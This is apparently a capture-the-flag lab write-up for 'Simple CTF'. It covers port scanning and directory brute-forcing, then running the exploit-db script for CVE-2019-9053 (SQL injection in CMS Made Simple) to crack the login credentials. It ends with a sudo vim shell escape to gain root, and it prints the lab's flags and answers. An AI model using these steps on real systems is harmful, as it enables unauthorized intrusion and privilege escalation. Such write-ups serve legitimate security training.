Simple CTF

Task 1 :  How many services are running under port 1000? 

Using Nmap we will do a full scan. We could use the -p 1-1000 since the question asks for ports under 1000 but we will do a full scan to get the lay of the land.

# nmap  -A -p- -Pn -oN nmap_output 

-A : Enables OS detection, version detection, script scanning, and traceroute

-p- : Scan all ports

-Pn : Disable host discovery. Port scan only. (No ping)

-oN : Output to normal file (nmap_output)

Answer 1 : Two (2)

Task 2 : What is running on the higher port?

The higher port is 2222

Answer 2 : SSH

Question 3 : What’s the CVE you’re using against the application?

Let’s have a look on the web app running on the server. I am going to use gobuster for this scan.

# gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt -t 10

dir : directory bruteforcing

-u : target URL

-w : wordlist

-t : thread count

Gobuster returned an interesting directory /simple. After navigating to this url, we can see that the application running on the server is called CMS made simple.

First result for “CMS made simple exploit” on google points to exploit-db exploit CMS Made Simple < 2.2.10-SQLInjection

Answer 3 : CVE-2019-9053

Task 4 : To what kind of vulnerability is the application vulnerable?

From the CVE description we can see it’s vulnerable to an SQL injection

Answer 4 : SQLi

Task 5 : What’s the password

HINT :You can use /usr/share/seclists/Passwords/Common-Credentials/best110.txt to crack the pass

In the /simple there is link to :

Application login page
POST request

For this, we will use the exploit we found earlier, CVE-2019-9053. This exploit already exists in the latest version of Kali.

# searchsploit cms made simple 2.2.8

This script is written in Python2, latest version of Kali use Python3 so we will need to convert the script using 2to3.

# apt install 2to3
# apt install python3-lib2to3
# apt install python3-toolz
# find / -type f -name
# python3 -m lib2to3 /usr/share/exploitdb/exploits/php/webapps/ -w
2to3 output

Now let’s run the script.

# python3 -u --crack -w /usr/share/dirb/wordlists/others/best110.txt

After a long long wait we got two hits.

Username : mitch

Password : secret

Answer 5 : secret

Task 6 : Where can you login with the details obtained?

First try was a success, SSH on port 2222

# ssh [email protected] -p 2222

And I also managed to connect to the admin panel at :

Answer 6 : SSH

Task 7 : What’s the user flag?

Having a look at the home directory.

Answer 7 : G00d j0b, keep up!

Task 8 : Is there any other user in the home directory? What’s its name?

Task 9 : What can you leverage to spawn a privileged shell?

$ cd /home && ls -la
$ sudo -l 

On the home directory we can see there is another user called sunbath.

Running the sudo -l command will let us know which commands we can run on the system.

Answer 8 : sunbath

Answer 9 : vim

Task 10 : What’s the root flag?

First stop for binary exploitation gtfobins.

$ sudo vim -c ':!/bin/sh'

Answer 10 : W3ll d0n3. You made it!